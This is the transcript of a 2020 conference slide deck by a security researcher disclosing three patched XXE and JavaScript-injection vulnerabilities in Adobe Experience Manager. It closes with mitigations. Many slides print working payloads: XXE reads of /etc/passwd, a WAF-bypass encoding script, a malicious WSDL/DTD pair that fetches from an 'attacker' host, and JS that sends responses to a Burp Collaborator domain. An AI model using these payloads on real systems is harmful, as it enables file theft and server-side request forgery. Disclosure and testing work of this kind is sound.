Upgrade to Pro — share decks privately, control downloads, hide ads and more …

A Hacker's perspective on AEM applications security

Mikhail Egorov
September 30, 2020

A Hacker's perspective on AEM applications security

Adobe Experience Manager (AEM), is a comprehensive content management solution for building websites, managing marketing content and assets. I started to look into AEM security back in 2015. Since then I discovered and reported several server-side vulnerabilities and developed toolset for AEM hacking to automate security testing of AEM web-applications.

In 2019 I reported one code injection and three XML external entity (XXE) vulnerabilities to Adobe PSIRT. They are known as CVE-2019-8086, CVE-2019-8087, CVE-2019-8088. These vulnerabilities allow anonymous attackers to compromise AEM web-application.

In the talk, I will disclose details of discovered vulnerabilities and exploitation techniques.

Mikhail Egorov

September 30, 2020
Tweet

More Decks by Mikhail Egorov

Other Decks in Programming

Transcript

  1. EUROPE'S LEADING AEM DEVELOPER CONFERENCE 28th – 30th SEPTEMBER 2020

    A Hacker's perspective on AEM applications security Mikhail Egorov, Security researcher & bug hunter
  2. 2 Intro

  3. whoami 3 ▪ Security researcher & full-time bug hunter ▪

    https://bugcrowd.com/0ang3el ▪ https://hackerone.com/0ang3el ▪ Conference speaker ▪ https://www.slideshare.net/0ang3el ▪ https://speakerdeck.com/0ang3el
  4. whoami 4 ▪ Toolset for AEM hacking ▪ https://github.com/0ang3el/aem-hacker

  5. 5 APSB19-48

  6. APSB19-48 6 ▪ http://helpx.adobe.com/security/products/experi ence-manager/apsb19-48.html ▪ CVE-2019-8086 / XML eXternal

    Entity Injection ▪ CVE-2019-8087 / XML eXternal Entity Injection ▪ CVE-2019-8088 / JavaScript Code Injection
  7. XML eXternal Entity (XXE) attacks 7 ▪ Do we see

    the parsed XML? ▪ What’s allowed by the XML parser? ▪ General external entities ▪ Parameter external entities ▪ External DTD loading
  8. XML eXternal Entity (XXE) attacks 8 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE

    foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <foo>&xxe;</foo> <foo>root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync … </foo>
  9. XML eXternal Entity (XXE) attacks 9 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE

    foo [ <!ENTITY % xxe SYSTEM "http://127.0.0.1:4503"> %xxe; ]> <foo></foo>
  10. XML eXternal Entity (XXE) attacks 10 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE

    foo SYSTEM "http://127.0.0.1:4503" []> <foo></foo>
  11. CVE-2019-8086 11 ▪ GuideInternalSubmitServlet @Service({Servlet.class}) @Properties({@Property( name = "sling.servlet.resourceTypes", value

    = {"fd/af/components/guideContainer"} ), @Property( name = "sling.servlet.methods", value = {"POST"} ), @Property( name = "sling.servlet.selectors", value = {"af.internalsubmit"} )}) public class GuideInternalSubmitServlet …
  12. CVE-2019-8086 12

  13. CVE-2019-8086 13

  14. CVE-2019-8086 14 ▪ XXE payload <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE afData

    [ <!ENTITY a SYSTEM "file:///etc/passwd"> ]> <afData>&a;</afData>
  15. CVE-2019-8086 15

  16. CVE-2019-8086 16 ▪ Exploitation hints ▪ We can JSON-encode XXE

    payload to bypass a WAF ▪ In Java we can list directory content ▪ /proc/self/cwd
  17. CVE-2019-8086 17 ▪ JSON-encoding data = '<?xml version="1.0" encoding="utf-8"?><!DOCTYPE afData

    [<!ENTITY a SYSTEM "file:///etc/passwd">]><afData>&a;</afData>' result = "“ for c in data: result = result + "\\u00%02x" % ord(c) print result
  18. CVE-2019-8086 18

  19. CVE-2019-8086 19 ▪ XXE payload <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE afData

    [ <!ENTITY a SYSTEM "file:///etc"> ]> <afData>&a;</afData>
  20. CVE-2019-8086 20

  21. CVE-2019-8086 21 ▪ Exploitation requirements ▪ There should be a

    node with fd/af/components/guideContainer resource type ▪ property=sling:resourceType&property.value=fd/af/comp onents/guideContainer ▪ Attacker should have a jcr:write access somewhere ▪ /content/usergenerated/etc/commerce/smartlists/
  22. CVE-2019-8086 22 ▪ Exploitation requirements ▪ Doesn’t work equally on

    different AEM versions ▪ Only blind SSRF for some versions <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE afData SYSTEM "http://localhost:4503" []> <afData></afData>
  23. CVE-2019-8087 23 ▪ WSDLInvokerServlet @Service({Servlet.class}) @Properties({@Property( name = "sling.servlet.resourceTypes", value

    = {"fd/af/components/guideContainer"} ), @Property( name = "sling.servlet.selectors", value = {"af.wsdl"} ), @Property( name = "sling.servlet.methods", value = {"POST"} )}) public class WSDLInvokerServlet …
  24. CVE-2019-8087 24

  25. CVE-2019-8087 25

  26. CVE-2019-8087 26 ▪ WSDL example ▪ https://cs.au.dk/~amoeller/WWW/webservices/wsdlexample.html

  27. CVE-2019-8087 27

  28. CVE-2019-8087 28 ▪ Malicious xxe.wsdl <?xml version="1.0"?> <!DOCTYPE definitions [

    <!ENTITY % dtd SYSTEM "http://attacker:1337/loot.dtd"> %dtd; %param1; ]> <definitions name="StockQuote" … <operation name="GetLastTradePrice"> <soap:operation soapAction="&internal;"/> …
  29. CVE-2019-8087 29 ▪ Malicious loot.dtd <!ENTITY % payload SYSTEM "file:///etc/passwd">

    <!ENTITY % param1 "<!ENTITY internal '%payload;'>">
  30. CVE-2019-8087 30

  31. CVE-2019-8087 31 ▪ Exploitation requirements ▪ There should be a

    node with fd/af/components/guideContainer resource type ▪ property=sling:resourceType&property.value=fd/af/comp onents/guideContainer ▪ Attacker should have a jcr:write access somewhere ▪ /content/usergenerated/etc/commerce/smartlists/
  32. CVE-2019-8087 32 ▪ Exploitation requirements ▪ Doesn’t work equally on

    different AEM versions ▪ On some AEM versions WSDLInvokerServlet is not present
  33. CVE-2019-8088 33 ▪ GuideSubmitServlet @Service({Servlet.class}) @Properties({@Property( name = "sling.servlet.resourceTypes", value

    = {"fd/af/components/guideContainer"} ), @Property( name = "sling.servlet.methods", value = {"POST"} ), @Property( name = "sling.servlet.selectors", value = {"af.submit", "af.agreement", "af.signSubmit"} )}) public class GuideSubmitServlet extends SlingAllMethodsServlet { …
  34. CVE-2019-8088 34

  35. CVE-2019-8088 35

  36. CVE-2019-8088 36

  37. CVE-2019-8088 37

  38. CVE-2019-8088 38

  39. CVE-2019-8088 39 ▪ Sandboxed Rhino engine on some AEM versions

    ▪ No RCE ▪ Sandbox allows network interactions ▪ SSRF w/ ability to see the response
  40. CVE-2019-8088 40 ▪ JS payload ');jQuery.get('http://727a14ifhq8on9vakssk6agtlkrafz.burpcollabo rator.net');//

  41. CVE-2019-8088 41

  42. CVE-2019-8088 42

  43. CVE-2019-8088 43 ▪ JS payload ');jQuery.get('http://727a14ifhq8on9vakssk6agtlkrafz.burpcollabo rator.net',function(data){jQuery.get('http://727a14ifhq8on9vakss k6agtlkrafz.burpcollaborator.net',{loot:data})});//

  44. CVE-2019-8088 44

  45. CVE-2019-8088 45

  46. CVE-2019-8088 46 ▪ Exploitation requirements ▪ There should be a

    node with fd/af/components/guideContainer resource type ▪ property=sling:resourceType&property.value=fd/af/comp onents/guideContainer ▪ Attacker should have a jcr:write access somewhere ▪ /content/usergenerated/etc/commerce/smartlists/
  47. CVE-2019-8088 47 ▪ Exploitation requirements ▪ Doesn’t work equally on

    different AEM versions ▪ RCE or SSRF
  48. APSB19-48 48 ▪ Keep AEM up to date ▪ http://helpx.adobe.com/security/products/experie

    nce-manager/apsb19-48.html ▪ Block jcr:write access for anonymous user ▪ /content/usergenerated/etc/commerce/smartlists/ ▪ Remove demo content (Geometrixx, WeRetail, …)
  49. 49 Thank you @0ang3el